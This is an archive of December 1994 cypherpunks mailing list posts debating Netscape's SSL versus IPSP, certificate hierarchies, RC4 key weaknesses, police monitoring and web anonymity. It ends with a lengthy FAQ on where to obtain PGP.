> of the same "why bother to do any research" attitude that got you into
> trouble in the first place.

Perry, they are not in trouble. They are the number one supplier
of the internet killer app. The plug for crypto that they have
placed in Netscape 0.96 is the number one force bringing crypto
awareness to the masses.

He said that Netscape would look at IPSP when it was beyond
the "near" phase.
The correct response is "Gee that is great. Here are some working
demo systems, and some slabs of documentation."

Your salesmanship leaves something to be desired.

--
 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd at netcom.com

From acspring at knoware.nl Tue Dec 13 11:16:56 1994
From: acspring at knoware.nl (Andrew Spring)
Date: Tue, 13 Dec 94 11:16:56 PST
Subject: Announcing - The DigitaLiberty Forum
Message-ID: <9412132018.AA14024@indy.knoware.nl>

>I am certain that the nattering nabobs of negativism would take issue
>with the mainstream miasma of majoritarianism.

Sigh. Sometimes I miss Spiro Agnew.

ObCryptoContent. SPIRO AGNEW is an anagram of GROW A PENIS

--
Man! Woman! Child! All! are up against the WALL of SCIENCE!
PGP Key print:4C 17 EC 47 A1 6D AF 67 F3 B4 26 24 FE B2 0F 5E

From amanda at intercon.com Tue Dec 13 11:30:51 1994
From: amanda at intercon.com (Amanda Walker)
Date: Tue, 13 Dec 94 11:30:51 PST
Subject: Clarification of my remarks about Netscape
Message-ID: <9412131431.AA19841@amanda.dial.intercon.com>

> All you need to do is get your server certificate from one of
> several places, including:
>
> RSA (commercial CA or server CA)

Do you need a server certificate issued directly by one of these PCAs,
or does it just need to be rooted there (i.e., can I use my
[hypothetical] corporate PCA, which itself has a certificate from the
RSA commercial PCA)?

If it's the former, I would strongly urge you to extend your clients to
include the latter. I don't want to have to go to RSA for every server
certificate--that's in part what the PCA hierarchy exists for.
Similarly, if I set up a personal server (with my home page, for
example), I'd like to be able to use a certificate issued by the RSA
Unaffiliated User CA, which is itself a PCA certified by the
Commercial CA.

Amanda Walker
InterCon Systems Corporation

From raph at netcom.com Tue Dec 13 11:32:16 1994
From: raph at netcom.com (Raph Levien)
Date: Tue, 13 Dec 94 11:32:16 PST
Subject: More 40-bit RC4 nonsense
Message-ID: <199412131931.LAA27397@netcom9.netcom.com>

Sticking my foot in my mouth, I wrote:
> If I recall correctly, the first byte out of the RC4 stream has
> about a 40% chance of being the first byte of the key. Thus, if the

Wrong. It _is_ true that the first byte of the key has a 40%
probability of being the first byte of the initial state vector. It is
_not_ true that the first byte of the initial state vector is the
first byte out of the RC4 stream. Next time I will check the (alleged)
source code before making a fool of myself.

Thus, my attack shortcut will not work. Kipp Hickman informs me
that the salt is concatenated with the secret part in such a way that
the secret portion is least significant. This seems wise because of
the key/statevector characteristic, but wouldn't make too much
difference either way in practice.

Sorry for the confusion.

Raph

From kipp at warp.mcom.com Tue Dec 13 11:33:57 1994
From: kipp at warp.mcom.com (Kipp E.B.
Hickman)
Date: Tue, 13 Dec 94 11:33:57 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412131431.AA19841@amanda.dial.intercon.com>
Message-ID: <9412131132.ZM18680@warp.mcom.com>

On Dec 13, 2:31pm, Amanda Walker wrote:
> Subject: Re: Clarification of my remarks about Netscape
> > All you need to do is get your server certificate from one of
> > several places, including:
> >
> > RSA (commercial CA or server CA)
>
> Do you need a server certificate issued directly by one of these PCAs, or does
> it just need to be rooted there (i.e., can I use my [hypothetical] corporate
> PCA, which itself has a certificate from the RSA commercial PCA)?

Unfortunately, for now, we only support cert's directly issued from
the imbedded CA's. One level deeper is not trustworthy in any case,
unless you make the user define trust. That requires a GUI and we
haven't done that yet.

> If it's the former, I would strongly urge you to extend your clients to
> include the latter. I don't want to have to go to RSA for every server
> certificate--that's in part what the PCA hierarchy exists for.

We agree, and someday this won't be a problem.

> Similarly, if I set up a personal server (with my home page, for example),
> I'd like to be able to use a certificate issued by the RSA Unaffiliated User
> CA, which is itself a PCA certified by the Commercial CA.

I didn't bother imbedding the RSA Unaffiliated User CA because I
didn't think server operators would use it to get certificates.

--
---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp at mcom.com          http://www.mcom.com/people/kipp/index.html

From jamesd at netcom.com Tue Dec 13 11:37:40 1994
From: jamesd at netcom.com (James A.
Donald)
Date: Tue, 13 Dec 94 11:37:40 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412131428.AA12085@snark.imsi.com>
Message-ID: <199412131937.LAA00857@netcom10.netcom.com>

> > I wrote:
> > But reality is that they have produced by far the coolest browser
> > there is, and they are bringing crypto to the masses, and you,
> > and Eric Hughes, and most of us, have not yet brought crypto
> > to the masses.

Perry E. Metzger writes
> You claim we haven't done anything and Netscape has.

Not what I claimed.

>
> ftp.csua.berkeley.edu has the swIPe code sitting right on it.
>
> It's being deployed by TIS in their new firewall products

I claimed you have not deployed crypto to the masses and they
have.

I did not claim that you have not deployed crypto and they have.

I am sick of you misrepresenting what I say, and I am sick
of Eric misrepresenting what I say.

Cut it out.

--
 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd at netcom.com

From sandfort at crl.com Tue Dec 13 11:49:21 1994
From: sandfort at crl.com (Sandy Sandfort)
Date: Tue, 13 Dec 94 11:49:21 PST
Subject: THROUGH THE LOOKING GLASS
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                         SANDY SANDFORT
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Bob Snyder's recent post suggested that my argument in favor of
wiring the cops could be used to support wiring of civilians or
employees. Not so.

Police are public officials. As such, they have no right to
privacy *with respect to their public acts*. When off duty, cops
have the same right as other citizens to privacy in their private
lives. I said my proposal was "anti- *bad* cop" and that it
would benefit good cops.
Do I need to say that it would only benefit good cops in the line
of duty? It would be bad for anyone--cops or civilians--in their
private lives.

Employees represent an intermediate position. If an employer is
foolish enough to require that employees be wired, 'sokay with
me. For most employees in most jobs, it would not be acceptable.
I think they would get jobs with less intrusive employers. Some
employers will wire some employees, whether or not the police are
wired.

Wiring the cops is a good idea; arguments about wiring employees
and citizens are nothing more than red herrings used to avoid
addressing the real issue of police accountability.

S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From sandfort at crl.com Tue Dec 13 11:52:54 1994
From: sandfort at crl.com (Sandy Sandfort)
Date: Tue, 13 Dec 94 11:52:54 PST
Subject: ABSOLUTELY NOTHING ABOUT ERIC OR JAMES IN THIS POST...
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                         SANDY SANDFORT
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Paul Ste. Marie offered an interesting suggestion to the use of
vital signs transmitted from wired cops:

    ... such a device would, when worn by an officer in
    court, essentially become a broadcast polygraph...

Tim May is correct that a "broadcast polygraph" is not planned by
Fleming and Co. However, they do contemplate at least sampling
vital signs using their technology. Since my opinion is that
polygraphs are almost totally useless for detecting deception, I
think the same would apply in spades to broadcast vital signs.
In addition, all that is planned for the localizer is pulse and
maybe blood pressure. That's enough to see if the officer is in
trouble (or engaged in sexual activity, by the way), but not
enough to test his/her veracity.

S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From jamesd at netcom.com Tue Dec 13 11:53:40 1994
From: jamesd at netcom.com (James A.
Donald)
Date: Tue, 13 Dec 94 11:53:40 PST
Subject: IPSP and Netscape
In-Reply-To: <199412130859.IAA10748@neon.mcom.com>
Message-ID: <199412131952.LAA02566@netcom10.netcom.com>

Eric Hughes wrote:
> > ... the claims that SSL is better than anything
> > else out there

Marc Andreessen writes
> I'm sorry, I don't remember such a claim being made.

Eric and Perry have repeatedly used this method - not only
attacking a straw man, but lying outright that their opponent
has *explicitly* proclaimed the straw man.

I am thoroughly sick of this dishonest debating tactic.

If someone genuinely believes his opponent assumes or implies
something that is obviously false he should say "implies" or
"assumes"

To say "claims" or "states" is to say something completely
different.

One may be a reasonable inference, as I inferred that Chomsky
sought to justify mass murder and brutal terror.

The other is a lie.

--
 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd at netcom.com

From srikar at netcom.com Tue Dec 13 11:58:43 1994
From: srikar at netcom.com (Shrieks)
Date: Tue, 13 Dec 94 11:58:43 PST
Subject: calling all cpunks on netcom
Message-ID: <199412131946.LAA26053@netcom20.netcom.com>

Hi all,

Just floating a trial balloon. Are you tired of the high traffic on
the cypherpunks list and having to wade through a ton of mail every
day? Any of you folks approaching your 5M limit from archiving too
many messages? Well, I am and I don't really want to start paying for
the extra memory.

I was wondering if it might be worth petitioning the netcom sysadmins
to start up a local newsgroup (eg. netcom.cpunks) that serves as an
archive for the mailing list. That way one gets to use the abilities
of to keep threads together and so forth.
I'm sure there are enough netcom subscribers to warrant this.

Another alternative might be to set up something along the lines of
discuss at mit, which is a local collection of "meetings" on various
topics that one can browse through and serves as a handy archiver too
since it isn't flushed nearly as often as a Usenet queue. I believe
this list is already archived in a discuss meeting at MIT.

Just a thought. Pheedback?

-S

----
Srikar "shrieks" Srinath    srikar at netcom.com    Hackito Ergo Sum
----
"Free your mind and your ass will follow." - George Clinton

From storm at marlin.ssnet.com Tue Dec 13 11:58:48 1994
From: storm at marlin.ssnet.com (Don Melvin)
Date: Tue, 13 Dec 94 11:58:48 PST
Subject: It works.
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I got PGP because of the comments by Freeh and I wanted to start
'showing the flag'. It was inconvenient doing it right while using
reading mail/news on-line so I settled for just adding the "PGP key
available" to my sig.

Then along comes Eric with the idea of signing the posts to
cypherpunks. All right, it's a good idea so I'll spend the time
necessary to set up PGP support with the off-line reader called YARN.

Now, been there done that. Funny thing is, last night I actually had
a valid reason to send something that I wanted to make sure didn't get
read along the way ($ involved). I had all the pieces, they were in
place, they worked. And due to time constraints, I wouldn't have been
able to do it, if everything hadn't been ready.

So, thanks Eric.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBLu29gbU8rMgiP9PxAQEgjQL/Vp3tc6gFWAh58RQinsdYMy1R6kS/KEHs
6TpGs8NzjNXT+yy+FHV0heI8R3F9mXZesefxj4XQmBxgKxkOcpp4PZQiXhHIiEOp
Gg6n+B8fPdGAVuydJXLlKu/69oMtbflw
=z+w3
-----END PGP SIGNATURE-----

From blancw at microsoft.com Tue Dec 13 12:03:59 1994
From: blancw at microsoft.com (Blanc Weber)
Date: Tue, 13 Dec 94 12:03:59 PST
Subject: James vs. Eric
Message-ID: <9412132003.AA27745@netmail.microsoft.com>

From: "L.
McCarthy"

Eric & James, how about taking the "You're flaming me !" "No, I'm just
insulting you !" portion of this debate to private email ? I sincerely
doubt that very many people on the list give a damn about any of the
above jousting.
..................................................................

Actually, I find it mildly amusing, myself, in between the Netscape
thing, and I'm also picking up on logic, game theory, and white
spaces.

Except I don't know what "De mortuis mentis, nil nisi Latinum" means
("the brain dead can't understand Latin"?) :>)

Blanc

From jim at acm.org Tue Dec 13 12:15:31 1994
From: jim at acm.org (Jim Gillogly)
Date: Tue, 13 Dec 94 12:15:31 PST
Subject: IDEA freeware
In-Reply-To: <9412130948.ZM18452@warp.mcom.com>
Message-ID: <9412132014.AA12191@mycroft.rand.org>

> "Kipp E.B. Hickman" writes:
> On Dec 13, 3:45pm, Tom Jones wrote:
> > Subject: IDEA freeware
> >
> > Please explain where this "freeware" IDEA code comes from. IDEA is a
> > patented algorithm that cannot be used without a license. PGP comes
> > with a license. I know of no other code in the US that has such a
> > license.

> If you are using it for non-commercial use, it's free.

If you're using PGP for non-commercial use, IDEA is free because it's
licensed for non-commercial PGP use. I'm pretty confident that you
need to get a separate IDEA license with any new product you use it
in, commercial or not. I have the e-mail contact address somewhere,
and can post it if need be.

Jim Gillogly
Mersday, 23 Foreyule S.R. 1994, 20:14

From hfinney at shell.portal.com Tue Dec 13 12:29:36 1994
From: hfinney at shell.portal.com (Hal)
Date: Tue, 13 Dec 94 12:29:36 PST
Subject: Authentication vs encryption: CPs on the web
In-Reply-To: <199412131851.NAA22099@bwnmr5.bwh.harvard.edu>
Message-ID: <199412132029.MAA22274@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

Adam Shostack writes:

> With all due respect, I disagree with your assessment.
>Anonymity is a job, and we should build small tools to do jobs. It is
>my feeling that building anonymity into the web will make the
>protocols more complex than they need to be.

I don't think this is necessarily the case. Anonymity is often a
matter of _not_ stamping identification onto a packet. Rather than
complicating protocols it will often just be a matter of having
options not to include certain fields.

For example, the current HTTP has an option to send a user name when
the client makes connections. I have heard that the Netscape client
sends this and has no switch to turn it off. You can put in a fake
name (or none) but then when you want to send email your reply address
is wrong. This is an example where support for privacy should be in
the client and can't really be added on.

> There is no anonymity in mail, but we have anonymous mail of
>varying privacy. I suspect mixmaster will greatly enhance that. To
>get privacy in the web, build a web remailer on top of the CERN or TIS
>HTTPd proxies. Encrypt between you & the proxy, let the proxy go out.

I think this is a fine idea if this could work. The way proxy support
works now, the client connects to the proxy and then sends it the URL.
This means that the proxy knows which clients are connecting to which
web pages and must be trusted to keep this private. What you need is
a way of chaining proxies such that no one proxy sees both the client
and server addresses. This is what we have with the remailers. But
again this would appear to require changes to the clients and
corresponding protocols.

Perhaps it would work to have a local trusted proxy running right on
your machine which implements the connection to a chain of web
remailers. You can run vanilla clients with their nice UI's and other
hot features, and all of your net accesses go through your local proxy
which cleans them up and uses chaining for access. This sounds like a
doable project which would be worth exploring.
Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLu4EARnMLJtOy9MBAQENJwIAvAM5rzAog54rLTmDy8wGBxJsxk4XfIYE
rGXif7AUrFwx+u1IeDnjQxNs8cul/1S/g02/rsyVKyCdT0dSfUCzoA==
=ZvjT
-----END PGP SIGNATURE-----

From marca at mcom.com Tue Dec 13 12:49:48 1994
From: marca at mcom.com (Marc Andreessen by way of marca@mcom.com Marc Andreessen)
Date: Tue, 13 Dec 94 12:49:48 PST
Subject: the netscape/ssl controversy
Message-ID: <199412132050.MAA28636@neon.mcom.com>

In article <199412131448.JAA07613 at cutter.clas.ufl.edu>, avi at clas.ufl.edu (Avi Harris Baumstein) wrote:

> so while ssl may well be a wonderful protocol, it does not address the
> problems that many cypherpunks see as being real. i think it would do
> netscape good to listen to and consider the views of many on this
> list, as they have many genuinely good ideas

Yup, we are absolutely doing so. We do not and have not assumed that
SSL is *the* answer to everything, and we will be doing a lot more
work over the next year and beyond to tackle many of these other
problems. We're listening to everyone, and we love constructive
suggestions and feedback.

Cheers,
Marc

--
Marc Andreessen
Netscape Communications Corp.
Mountain View, CA
marca at mcom.com

From marca at mcom.com Tue Dec 13 12:49:53 1994
From: marca at mcom.com (Marc Andreessen by way of marca@mcom.com Marc Andreessen)
Date: Tue, 13 Dec 94 12:49:53 PST
Subject: BofA+Netscape
Message-ID: <199412132050.MAA28648@neon.mcom.com>

In article <9412131442.AA12105 at snark.imsi.com>, perry at imsi.com wrote:

> Marc Andreessen says:
> > >I told you in Email, Mr. Andreessen, that new transport level security
> > >protocols are useless now that IPSP has come near to standardization
> > >and now that prototype implementations are nearly available.
> >
> > Great, IPSP looks fantastic and we look forward to supporting it
> > as it moves through and beyond the "near" phase.
>
> Given that you haven't read any IPSP documents, I can only interpret
> your comments as sarcasm.
No, actually, my comments weren't (aren't) sarcasm.

Marc

--
Marc Andreessen
Netscape Communications Corp.
Mountain View, CA
marca at mcom.com

From sdw at lig.net Tue Dec 13 12:50:39 1994
From: sdw at lig.net (Stephen D. Williams)
Date: Tue, 13 Dec 94 12:50:39 PST
Subject: subscription terminstion
In-Reply-To: <01HKLHEHFPB6006HMI@FRCU.EUN.EG>
Message-ID:

>
> please i want to terminate my subscription in your group
> because i have small quota .
>

It's not the size of your quota, it's how you use it...

--
Stephen D. Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/~sdw
Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95
OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94

From marca at mcom.com Tue Dec 13 12:51:46 1994
From: marca at mcom.com (Marc Andreessen by way of marca@mcom.com Marc Andreessen)
Date: Tue, 13 Dec 94 12:51:46 PST
Subject: BofA+Netscape
Message-ID: <199412132050.MAA28663@neon.mcom.com>

In article <199412131914.LAA26551 at netcom10.netcom.com>, jamesd at netcom.com (James A. Donald) wrote:

> > Marc Andreessen says:
> > > Great, IPSP looks fantastic and we look forward to supporting it
> > > as it moves through and beyond the "near" phase.
>
> He said that Netscape would look at IPSP when it was beyond
> the "near" phase.

Nope, I said we "look forward to supporting it". Slight
difference. :-) We are looking at it already.

Marc

--
Marc Andreessen
Netscape Communications Corp.
Mountain View, CA
marca at mcom.com

From merriman at metronet.com Tue Dec 13 13:02:17 1994
From: merriman at metronet.com (David K.
Merriman) Date: Tue, 13 Dec 94 13:02:17 PST Subject: Enough, already Message-ID: <199412132101.AA01632@metronet.com> I don't mean to be a wet blanket (well, actually, I do :-), but could folks maybe drop the Netscape stuff - along with the tangential threads it has spawned? I kinda suspect that by now, the subject has been thoroughly flogged to death, and it's cluttering the hell out of the list - without the benefit of actually _resolving_ anything. Netscape is gonna do whatever the hell Netscape is gonna do. "We" can encourage, cajole, reprimand, sneer, laugh, applaud, or whatever; but the bottom line is that clarifying the clarifications of the clarified previous comments isn't accomplishing anything other than making those among us who have to pay for email work overtime to compensate for the subject. It's the holiday season. How about if everyone wishes everyone else a Merry Christmas (or Chappy Chanukka, or whatever else spins your propeller), kisses, and makes up? Dave "I'm just checking how to make Chameleon killfile the subjects 'clarif', 'Netscape', and 'BofA'" Merriman PS - for point of reference, my mailbox has 41 messages in it since I last checked mail (less than 6 hours ago). Only 3 are non-CP; of the 38 that are, only a very, VERY few don't have "netscape" or "clarification" in the subject line. - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at fohnix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. 
Kennedy

From mpj at netcom.com Tue Dec 13 13:07:34 1994
From: mpj at netcom.com (Michael Paul Johnson)
Date: Tue, 13 Dec 94 13:07:34 PST
Subject: Where to get PGP FAQ
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

===============================BEGIN SIGNED TEXT=============================

WHERE TO GET THE PRETTY GOOD PRIVACY PROGRAM (PGP)
(Last modified: 13 December 1994 by Mike Johnson)

WHAT IS THE LATEST VERSION?

|-----------------+---------------------+---------------------------------|
| Platform(s)     | Latest Version      | Distribution File Names         |
|-----------------+---------------------+---------------------------------|
| DOS, Unix,      | Viacrypt PGP 2.7    | disk sets                       |
| Mac, Windows,   |                     |                                 |
| or WinCIM/CSNav |                     |                                 |
|-----------------+---------------------+---------------------------------|
| DOS, Unix,      | MIT PGP 2.6.2       | pgp262.zip (DOS + docs)         |
| others          |                     | pgp262s.zip (source)            |
|                 |                     | pg262s.zip source on CompuServe |
|                 |                     | pgp262.tar.gz (source)          |
|                 |                     | pgp262.gz (same as above on DOS)|
|                 |                     | pgp262.tar.Z (source)           |
|                 |                     | pgp262dc.zip (documentation)    |
|                 |                     | pg262d.zip (docs on CompuServe) |
|-----------------+---------------------+---------------------------------|
| Macintosh       | MIT PGP 2.6         | MacPGP2.6.sea.hqx (binary+docs) |
|                 |                     | macpgp26.hqx (same as above)    |
|                 |                     | MacPGP2.6.src.sea.hqx (source)  |
|                 |                     | macpgp26.src (same as above)    |
|                 |                     | MacPGP2.6-68000.sea.hqx (binary)|
|                 |                     | mcpgp268.hqx (same as above)    |
|-----------------+---------------------+---------------------------------|
| Mac Applescript | MacPGP 2.6ui v 1.2  | MacPGP-2.6ui-v1.2.sit.hqx       |
|                 | + some beta versions| MacPGP2.6ui_V1.2_sources.cpt.hqx|
|                 | based on MIT PGP    | MacPGP2.6uiV1.2en.cpt.hqx       |
|                 | 2.6.2               | MacPGP2.6uiV1.2src.cpt.hqx      |
|                 |                     | MacPGP2.6uiV1.2.68000.hqx       |
|-----------------+---------------------+---------------------------------|
| Amiga           | PGP 2.6.2 Amiga 1.4 | pgp262-a14-000.lha              |
|                 |                     | pgp262-a14-020.lha              |
|                 |                     | pgp262-a14-src.lha              |
|-----------------+---------------------+---------------------------------|
| Atari           | Atari PGP 2.6ui     | pgp26uib.lzh (binary, docs)     |
|                 |                     | pgp26uis.lzh                    |
|-----------------+---------------------+---------------------------------|
| Archimedes      | Archimedes 2.3a     | ArcPGP23a                       |
|-----------------+---------------------+---------------------------------|
| Non-USA version | PGP 2.6.i from      | pgp26i.zip                      |
| to avoid RSAREF | Stale Schumacher    | pgp26is.zip                     |
| license.        |                     | pgp26is.tar.gz                  |
|_________________|_____________________|_________________________________|

WHERE CAN I GET THE PGP VERSION DIRECTLY FROM PHILIP ZIMMERMANN?

This is the MIT version. For several good reasons, Phil is releasing the main line freeware PGP through MIT, at net-dist.mit.edu. See a list of sites that also carry this version, below, or use this WWW URL: http://web.mit.edu/network/pgp-form.html

WHAT IS PGP 2.6.i?

Stale Schumacher released an international version of PGP built the "right way." By "right way," I mean that it uses the latest MIT code, but uses a different rsaglue.c to use the mpilib instead of RSAREF for RSA calculations, thus including all the latest bug fixes and features in the main freeware PGP code line, but frees non-USA persons from the limitations of the RSAREF license. This release has been as strongly endorsed by Philip Zimmermann as he can do without incriminating himself. Naturally, by not using the RSAREF code for RSA calculations, this version is not legal for use in the USA (other than limited research, etc.), but is fine anywhere else (like Canada) where RSA patents don't hold. Note that the latest version of Stale Schumacher's PGP is 2.6.i; 2.6i (without the second .) was a beta test version that has been superseded.

WHAT IS PGP 2.6ui?

The "unofficial international" versions are really just PGP 2.3a, modified just enough to make it compatible with MIT PGP 2.6, but do not include all of the fixes in MIT PGP 2.6 and MIT PGP 2.6.1.
They have a "ui" somewhere in their file names. I recommend the use of the "ui" versions only if you are using a platform for which there is no Viacrypt or MIT PGP that works properly. For a version that doesn't use RSAREF, PGP 2.6.i from Stale Schumacher is a better choice, because it is more up-to-date. WHERE CAN I GET VIACRYPT PGP? If you are a commercial user of PGP in the USA or Canada, contact Viacrypt in Phoenix, Arizona, USA. The commercial version of PGP is fully licensed to use the patented RSA and IDEA encryption algorithms in commercial and government environments in the USA and Canada. It is fully compatible with, functionally the same as, and just as strong as the freeware version of PGP. Due to limitations on ViaCrypt's RSA distribution license, ViaCrypt only distributes executable code and documentation for it, but they are working on making PGP available for a variety of platforms. Call or write to them for the latest information. The latest version number for Viacrypt PGP is 2.7. Here is a brief summary of Viacrypt's currently-available products: 1. ViaCrypt PGP for MS-DOS. Prices start at $99.98 2. ViaCrypt PGP for UNIX. Includes executables for the following platforms: SunOS 4.1.x (SPARC) IBM RS/6000 AIX HP 9000 Series 700/800 UX SCO 386/486 UNIX SGI IRIX AViiON DG-UX(88/OPEN) Prices start at $149.98 Executables for the following additional platforms are available upon request for an additional $30.00 charge. BSD 386 Ultrix MIPS DECstation 4.x 3. ViaCrypt PGP for WinCIM/CSNav. A special package for users of CompuServe. Prices start at $119.98 Please contact ViaCrypt for quantity discount pricing. Orders may be placed by calling 800-536-2664 during the hours of 8:30am to 5:00pm MST, Monday - Friday. They accept VISA, MasterCard, AMEX and Discover credit cards. If you have further questions, please feel free to contact: Paul E. Uhlhorn Director of Marketing, ViaCrypt Products Mail: 9033 N.
24th Avenue Suite 7 Phoenix AZ 85021-2847 Phone: (602) 944-0773 Fax: (602) 943-2601 Internet: viacrypt at acm.org Compuserve: 70304.41 WHERE CAN I GET THE FREEWARE PGP? These listings are subject to change without notice. If you find that PGP has been removed from any of these sites, please let me know so that I can update this list. Likewise, if you find PGP on a good site elsewhere (especially on any BBS that allows first time callers to access PGP for free), please let me know so that I can update this list. Because this list changes frequently, I have not attempted to keep it complete, but there should be enough pointers to let you easily find PGP. There are several ways to get the freeware PGP: ftp, WWW, BBS, CompuServe, email ftp server, and sneakernet (ask a friend for a copy). Just don't ask Philip Zimmermann directly for a copy. FTP SITES IN NORTH AMERICA There are some weird hoops to jump through, thanks to the U. S. Department of State and the ITAR, at many of these sites. Telnet to net-dist.mit.edu, log in as getpgp, answer the questions, then ftp to net-dist.mit.edu and change to the hidden directory named in the telnet session to get your own copy. MIT-PGP is for U. S. and Canadian use only, but MIT is only distributing it within the USA (due to some archaic export control laws). 1. Read ftp://net-dist.mit.edu/pub/PGP/mitlicen.txt and agree to it. 2. Read ftp://net-dist.mit.edu/pub/PGP/rsalicen.txt and agree to it. 3. Telnet to net-dist.mit.edu and log in as getpgp. 4. Answer the questions and write down the directory name listed. 5. QUICKLY end the telnet session with ^C and ftp to the indicated directory on net-dist.mit.edu (something like /pub/PGP/dist/U.S.-only-????) and get the distribution files (see the above chart for names). If the hidden directory name is invalid, start over at step 3, above.
You can also get PGP from: ftp.csn.net/mpj ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/pgp/ See ftp://ftp.csn.net/mpj/README.MPJ for the ??????? See ftp://ftp.csn.net/mpj/help for more help on negotiating this site's export control methods (open to USA and Canada). ftp.netcom.com/pub/mp/mpj ftp://ftp.netcom.com/mp/mpj/I_will_not_export/crypto_???????/pgp/ See ftp://ftp.netcom.com/pub/mp/mpj/README.MPJ for the ??????? See ftp://ftp.netcom.com/pub/mp/mpj/help for more help on negotiating this site's export control methods. TO GET THESE FILES BY EMAIL, send mail to ftp-request at netcom.com containing the word HELP in the body of the message for instructions. You will have to work quickly to get README.MPJ then the files before the ??????? part of the path name changes again (several times a day). ftp.eff.org Follow the instructions found in README.Dist that you get from one of: ftp://ftp.eff.org/pub/Net_info/Tools/Crypto/README.Dist gopher.eff.org, 1/Net_info/Tools/Crypto gopher://gopher.eff.org/11/Net_info/Tools/Crypto http://www.eff.org/pub/Net_info/Tools/Crypto/ ftp.csua.berkeley.edu (for U. S. or Canadian users) /pub/cypherpunks/pgp/ ftp.wimsey.bc.ca /pub/crypto/software/dist/US_or_Canada_only_XXXXXXX/PGP (U. S. and Canadian users only) See /pub/crypto/software/README for the characters for XXXXXXXX This site has all public releases of the freeware PGP. WORLD WIDE WEB ACCESS http://web.mit.edu/network/pgp-form.html http://www.ifi.uio.no/~staalesc/PGPVersions.html http://www.mantis.co.uk/pgp/pgp.html http://rschp2.anu.edu.au:8080/crypt.html http://www.eff.org/pub/Net_info/Tools/Crypto/ http://community.net/community/all/home/solano/sbaldwin COMPUSERVE The NCSA Forum sysops have a library (Library 12: Export Controlled) that is available only to people who send them a message asserting that they are within the U. S. A. This library contains PGP. I have also seen PGP in some other places on Compuserve. 
Try searching for PGP262.ZIP in the IBMFF forum for up-to-date information on PGP in selected other areas. The last time I tried a search like this, PGP was found in the PC World Online forum (GO PWOFORUM) new uploads area, along with several PGP shells and accessories. I've also heard that EUROFORUM carries PGP, but have not confirmed this. Compuserve file names are even more limited than DOS (6.3 instead of the already lame 8.3), so the file names to look for are PGP262.ZIP, PG262S.ZIP (source code), PGP262.GZ (Unix source code) and PG262D.ZIP (documentation only). BULLETIN BOARD SYSTEMS Colorado Catacombs BBS Mike Johnson, sysop Mac and DOS versions of PGP, PGP shells, and some other crypto stuff. Also the home of some good Bible search files and some shareware written by Mike Johnson, including ATBASH, DLOCK, CRYPTA, CRYPTE, CRYPTMPJ, MCP, MDIR, DELETE, PROVERB, SPLIT, ONEPAD, QUICRYPT, etc. v.FAST/v.32bis/v.42bis, speeds up to 28,800 bps 8 data bits, 1 stop, no parity, as fast as your modem will go. Use ANSI terminal emulation, or if you can't, try VT-100. Free access to PGP. If busy or no answer, try again later. Log in with your own name, or if someone else already used that, try a variation on your name or pseudonym. You can request access to crypto software on line, and if you qualify legally under the ITAR, you can download on the first call. For free access: log in with your own name, answer the questions, then select [Q]uestionaire 3 from the [M]ain menu. (303) 772-1062 Longmont, Colorado number - 2 lines. (303) 938-9654 Boulder, Colorado number forwarded to Longmont number intended for use by people in the Denver, Colorado area.
The Freedom Files BBS, DeLand Florida, USA 904-738-2691 Exec-Net, New York, NY, USA (Host BBS for the ILink net) 914-667-4567 The Ferret BBS (North Little Rock, Arkansas) (501) 791-0124 also (501) 791-0125 Special PGP users account: login name: PGP USER password: PGP This information from: Jim Wenzel CVRC BBS 317-791-9617 CyberGold BBS 601-582-5748 Self-Governor Information Resource, 915-587-7888, El Paso, Texas, USA In the UK, try 01273-688888 Other BBS -- check your local BBS. Chances are good that it has any release that is at least a month old if it has much of a file area at all. OTHER FTP SITES ftp.informatik.uni-hamburg.de /pub/virus/crypt/pgp This site has most, if not all, of the current PGP files. ftp.ox.ac.uk (163.1.2.4) /pub/crypto/pgp This is a well organized site with most of the current PGP files as well as shells and mailer scripts. ftp.netcom.com /pub/dc/dcosenza -- Some crypto stuff, sometimes includes PGP. /pub/qw/qwerty -- How to MacPGP Guide, largest steganography ftp site as well. PGP FAQ, crypto FAQ, US Crypto Policy FAQ, Steganography software list. MacUtilites for use with MacPGP. Stealth1.1 + other steganography programs. Send mail to ftp-request at netcom.com with "HELP" in the body of the message if you don't have ftp access.
